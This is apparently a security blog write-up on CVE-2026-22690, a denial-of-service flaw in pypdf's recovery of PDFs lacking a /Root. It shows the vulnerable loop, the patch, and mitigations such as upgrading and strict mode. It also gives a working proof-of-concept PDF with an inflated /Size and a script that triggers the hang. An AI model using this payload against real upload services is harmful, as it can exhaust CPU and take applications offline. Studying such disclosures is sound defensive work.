Infinite Loops in the Library: Breaking pypdf with Polite Parsing
Jan 11, 2026
Executive Summary (TL;DR)
pypdf tries to be helpful by recovering broken PDFs that lack a valid Root object. However, it decides how hard to search based on the file's own metadata (`/Size`). An attacker can set this value into the billions, forcing the library into a CPU-bound loop that is effectively endless as it hunts for a phantom object.
The result is a Denial of Service vulnerability in the pypdf library (CVE-2026-22690), caused by an uncontrolled loop during the recovery of malformed PDF files.
The Hook: Kindness Kills
There is an old adage in software engineering known as Postel's Law: "Be conservative in what you do, be liberal in what you accept from others." It sounds noble. It sounds robust. In the security world, however, we often call this "attack surface expansion."
pypdf, one of the most popular Python libraries for manipulating PDFs (used in everything from banking OCR pipelines to those trendy AI RAG chatbots), fell victim to its own benevolence. When you feed pypdf a pristine PDF, it works great. But when you feed it a broken PDF—specifically one missing its Document Catalog (the /Root)—it doesn't just error out. It tries to fix it for you.
This recovery mechanism is the heart of CVE-2026-22690. The library assumes that if the map is broken, it can just walk the entire territory to find the destination. The problem? The attacker gets to define the size of the territory.
The Flaw: Trusting the Map Legend
To understand this bug, you need to know a tiny bit about PDF structure. A PDF ends with a trailer dictionary, followed by a startxref pointer that tells the parser where to find the xref table (the index of objects). The trailer also records, crucially, which object is the /Root. The /Root is the entry point to the document hierarchy.
But what if the /Root key is missing? In default mode (non-strict), pypdf engages a fallback routine. It decides to iterate through every possible object ID to see if it looks like a Catalog.
Here is the fatal logic error: to know how many objects to scan, pypdf looks at the /Size key in the trailer. This key is supposed to hold the number of entries in the cross-reference table, which is one more than the highest object number in the file. Since the trailer is attacker-controlled input, an attacker can set /Size to 2,147,483,647 (INT_MAX) without actually providing that many objects.
When pypdf sees this, it essentially says, "Okay, I will now attempt to parse and validate 2 billion objects to find your missing root." It loops. It fails to find an object. It catches the exception. It loops again. This burns CPU cycles faster than a crypto miner, locking up the thread for as long as the attacker's number dictates.
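To make the cost concrete, here is a minimal simulation of that fallback. It is not pypdf's code: `ToyReader`, `get_object`, and `find_catalog` are hypothetical names, and the "file" is just a dict of objects plus a declared size. The point is only that the number of lookups tracks the declared `/Size`, not the number of objects that really exist.

```python
class ToyReader:
    """Hypothetical stand-in for a PDF reader; not pypdf's real class."""

    def __init__(self, objects: dict, declared_size: int):
        self.objects = objects              # objects actually present in the file
        self.declared_size = declared_size  # the trailer's /Size, attacker-controlled
        self.lookups = 0

    def get_object(self, obj_id: int) -> dict:
        self.lookups += 1
        return self.objects[obj_id]         # raises KeyError for phantom objects

    def find_catalog(self):
        # Scan every ID the trailer claims exists, swallowing lookup failures.
        for obj_id in range(1, self.declared_size + 1):
            try:
                obj = self.get_object(obj_id)
            except KeyError:
                continue
            if obj.get("/Type") == "/Catalog":
                return obj
        return None


# One real object, but the trailer claims 200,000 of them.
reader = ToyReader({1: {"/Type": "/Page"}}, declared_size=200_000)
result = reader.find_catalog()
print(result, reader.lookups)
```

The file holds a single object, yet the scan performs one lookup per claimed ID before giving up empty-handed.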
The Code: The Smoking Gun
Let's look at the vulnerable logic in pypdf/_reader.py. This is a classic case of an unbounded loop controlled by untrusted input.

    # VULNERABLE CODE (Simplified)
    # The 'nb' variable is taken directly from the file trailer
    nb = cast(int, self.trailer.get("/Size", 0))
    # The loop runs from 0 to the attacker-supplied size
    for i in range(nb):
        try:
            # Attempt to parse object #i
            o = self.get_object(i + 1)
        except Exception:
            # If it fails, swallow the error and keep going
            o = None
        # Check if we accidentally found the Root
        if isinstance(o, DictionaryObject) and o.get("/Type") == "/Catalog":
            self._validated_root = o
            break

If I give you a file that is 1KB in size, but I set /Size to 100,000,000, this loop runs 100 million times. The try/except block makes it worse because exception handling in Python is relatively expensive compared to standard control flow.
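If you want a rough feel for the numbers, the sketch below times a loop of failing lookups and extrapolates linearly. Everything in it is illustrative: `failing_lookup`, `seconds_per_iteration`, and `projected_seconds` are made-up helpers, and a real pypdf lookup also seeks and parses, so treat the projection as a floor rather than a measurement of the library.

```python
import time


def failing_lookup(obj_id: int):
    """Hypothetical lookup that always fails, like a scan for a phantom object."""
    raise KeyError(obj_id)


def seconds_per_iteration(samples: int = 50_000) -> float:
    """Time a try/except loop over `samples` failing lookups."""
    start = time.perf_counter()
    for i in range(samples):
        try:
            failing_lookup(i + 1)
        except Exception:
            pass
    return (time.perf_counter() - start) / samples


def projected_seconds(declared_size: int, per_iteration: float) -> float:
    """Linear extrapolation: total time grows in step with /Size."""
    return declared_size * per_iteration


per_iter = seconds_per_iteration()
for size in (10_000, 100_000_000, 2_147_483_647):
    print(f"/Size={size:>13,}: ~{projected_seconds(size, per_iter):,.1f} s")
```

The absolute figures depend on your machine, but the shape does not: the attacker picks the multiplier.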
The fix, applied in commit 294165726b646bb7799be1cc787f593f2fdbcf45, introduces sanity. It caps the benevolence:

    # PATCHED CODE
    # Set a hard limit on how nice we are willing to be
    limit = self.root_object_recovery_limit # defaults to 10,000
    for i in range(nb):
        if i > limit:
            raise LimitReachedError("Root object not found within limit")
        # ... existing logic ...

They also optimized the search mechanism, but the hard limit is the real mitigation here.
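The same idea can be tried outside the library. The following is a standalone sketch of a bounded search, not the patched pypdf source: `find_catalog_bounded` is a hypothetical function, objects are plain dicts, and `LimitReachedError` is defined locally so the snippet runs on its own.

```python
class LimitReachedError(Exception):
    """Local stand-in for the error named in the patch; defined here for the sketch."""


def find_catalog_bounded(get_object, declared_size: int, limit: int = 10_000):
    """Scan object IDs for a /Catalog, giving up after `limit` candidates."""
    for i in range(declared_size):
        if i > limit:
            raise LimitReachedError("Root object not found within limit")
        try:
            obj = get_object(i + 1)
        except Exception:
            continue  # phantom or broken object; try the next ID
        if isinstance(obj, dict) and obj.get("/Type") == "/Catalog":
            return obj
    return None


# A recoverable file: the catalog is object 3.
objects = {3: {"/Type": "/Catalog"}}
print(find_catalog_bounded(objects.__getitem__, declared_size=5))

# A hostile file: huge declared size, no objects at all.
try:
    find_catalog_bounded({}.__getitem__, declared_size=999_999_999)
except LimitReachedError as exc:
    print("gave up:", exc)
```

Honest-but-broken files still get rescued, while hostile ones cost a bounded number of lookups no matter what `/Size` claims.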
The Exploit: Crafting the Death PDF
You don't need complex fuzzing tools to exploit this. You just need a text editor. A PDF is partially ASCII, and the trailer is usually readable at the end of the file.
Here is the recipe for a denial-of-service payload:
- Take a valid, minimal PDF.
- Delete the `/Root` entry from the trailer dictionary.
- Set the `/Size` entry to a massive integer.
Your file might look like this:

    %PDF-1.7
    1 0 obj
    << /Type /Page >>
    endobj
    xref
    0 1
    0000000000 65535 f
    trailer
    <<
    /Size 999999999 % <--- The Weapon
    % /Root is intentionally missing
    >>
    startxref
    10
    %%EOF

When a victim script runs:

    from pypdf import PdfReader
    reader = PdfReader("malicious.pdf")
    # Triggers the property access
    print(reader.pages[0])

The process will hang. On a single core, it pins the CPU to 100%. In a web server context (like Gunicorn or uWSGI), sending a few of these requests will starve all worker threads, effectively taking the application offline.
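One way to keep a hung parse from taking a worker down with it is to do the parsing in a child process with a deadline. The sketch below uses only the standard library; `run_isolated` and `PARSE_SNIPPET` are hypothetical names, and the snippet assumes pypdf is installed in the child interpreter. The demo call at the bottom uses a sleeping child instead of a real PDF so it runs anywhere.

```python
import subprocess
import sys

# Hypothetical child script: open the PDF and touch the first page.
PARSE_SNIPPET = (
    "import sys\n"
    "from pypdf import PdfReader\n"
    "PdfReader(sys.argv[1]).pages[0]\n"
)


def run_isolated(snippet: str, arg: str, timeout_s: float) -> str:
    """Run `snippet` in a child interpreter; return 'ok', 'error', or 'timeout'."""
    try:
        proc = subprocess.run(
            [sys.executable, "-c", snippet, arg],
            timeout=timeout_s,      # the child is killed when this expires
            capture_output=True,
        )
    except subprocess.TimeoutExpired:
        return "timeout"
    return "ok" if proc.returncode == 0 else "error"


# Stand-in for a hostile file: a child that would otherwise run for a minute.
print(run_isolated("import time; time.sleep(60)", "unused", timeout_s=1.0))

# With pypdf installed, an upload could be screened like this:
# status = run_isolated(PARSE_SNIPPET, "upload.pdf", timeout_s=5.0)
```

This does not fix the bug, and spawning a process per file has a cost, but it converts a stuck worker into a rejected upload.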
The Mitigation: Stop the Bleeding
The primary fix is to upgrade pypdf. Version 6.6.0 introduces root_object_recovery_limit, which defaults to 10,000. This turns a near-endless hang into a split-second search that fails gracefully.
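If you want your service to refuse to start on a vulnerable install, a startup check along these lines is one option. It is a sketch with a deliberately naive version parser: `parse_release`, `is_patched`, and `check_pypdf` are hypothetical helpers, and pre-release suffixes are simply ignored, so a proper version library is the better choice for anything beyond a quick guard.

```python
from importlib.metadata import PackageNotFoundError, version

FIXED = (6, 6, 0)  # first release with the recovery limit, per this write-up


def parse_release(text: str) -> tuple:
    """Turn '6.6.0' into (6, 6, 0); stops at the first non-numeric component."""
    parts = []
    for piece in text.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    parts += [0] * (3 - len(parts))  # pad '6.6' to (6, 6, 0)
    return tuple(parts)


def is_patched(installed: str) -> bool:
    return parse_release(installed) >= FIXED


def check_pypdf() -> str:
    try:
        installed = version("pypdf")
    except PackageNotFoundError:
        return "pypdf is not installed"
    state = "patched" if is_patched(installed) else "VULNERABLE, upgrade to 6.6.0+"
    return f"pypdf {installed}: {state}"


print(check_pypdf())
```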
If you cannot upgrade immediately (perhaps you are pinned to an older version due to dependencies), you have a configuration-level workaround: Strict Mode.

    # Workaround for older versions
    from pypdf import PdfReader
    reader = PdfReader("untrusted.pdf", strict=True)

When strict=True is set, pypdf refuses to engage in the "guess the root object" game. If the /Root is missing from the trailer, it raises an exception immediately rather than entering the vulnerable recovery loop.
[!NOTE] This vulnerability highlights a crucial lesson for parser developers: Never loop on user-controlled integers without an upper bound. Trusting metadata to define loop constraints is a recipe for resource exhaustion.
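The lesson in that note can also be applied before a file ever reaches the parser. The heuristic below is an assumption of mine, not something pypdf does: it rejects a file whose declared `/Size` is larger than the file's own byte length, on the theory that every object needs at least some bytes. `size_is_plausible` is a hypothetical helper, the regex matches any `/Size` key it finds (including unrelated dictionaries such as embedded-file parameters), and heavily compressed files could be rejected by mistake, so treat it as a coarse pre-filter only.

```python
import re

# Matches entries such as "/Size 999999999" anywhere in the raw bytes.
SIZE_RE = re.compile(rb"/Size\s+(\d+)")


def size_is_plausible(pdf_bytes: bytes) -> bool:
    """Reject files whose declared /Size exceeds the file's own length in bytes."""
    declared = [int(m) for m in SIZE_RE.findall(pdf_bytes)]
    if not declared:
        return True  # nothing to check here; leave the decision to the parser
    return max(declared) <= len(pdf_bytes)


hostile = b"%PDF-1.7\ntrailer\n<<\n/Size 999999999\n>>\nstartxref\n10\n%%EOF"
benign = b"%PDF-1.7\n" + b"x" * 200 + b"\ntrailer\n<< /Size 6 /Root 1 0 R >>\n%%EOF"
print(size_is_plausible(hostile), size_is_plausible(benign))
```

The bound is crude on purpose: it never loops on the attacker's number, it only compares it against something the attacker has to pay for, namely bytes.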
Technical Appendix
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| pypdf (py-pdf) | < 6.6.0 | 6.6.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 |
| Attack Vector | Network (via File Upload) |
| CVSS v4 | 2.7 (Low) |
| Impact | Denial of Service (CPU Exhaustion) |
| EPSS Score | 0.00042 (Low Probability) |
| Patch Status | Released (v6.6.0) |
MITRE ATT&CK Mapping
CWE-400 (Uncontrolled Resource Consumption): The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.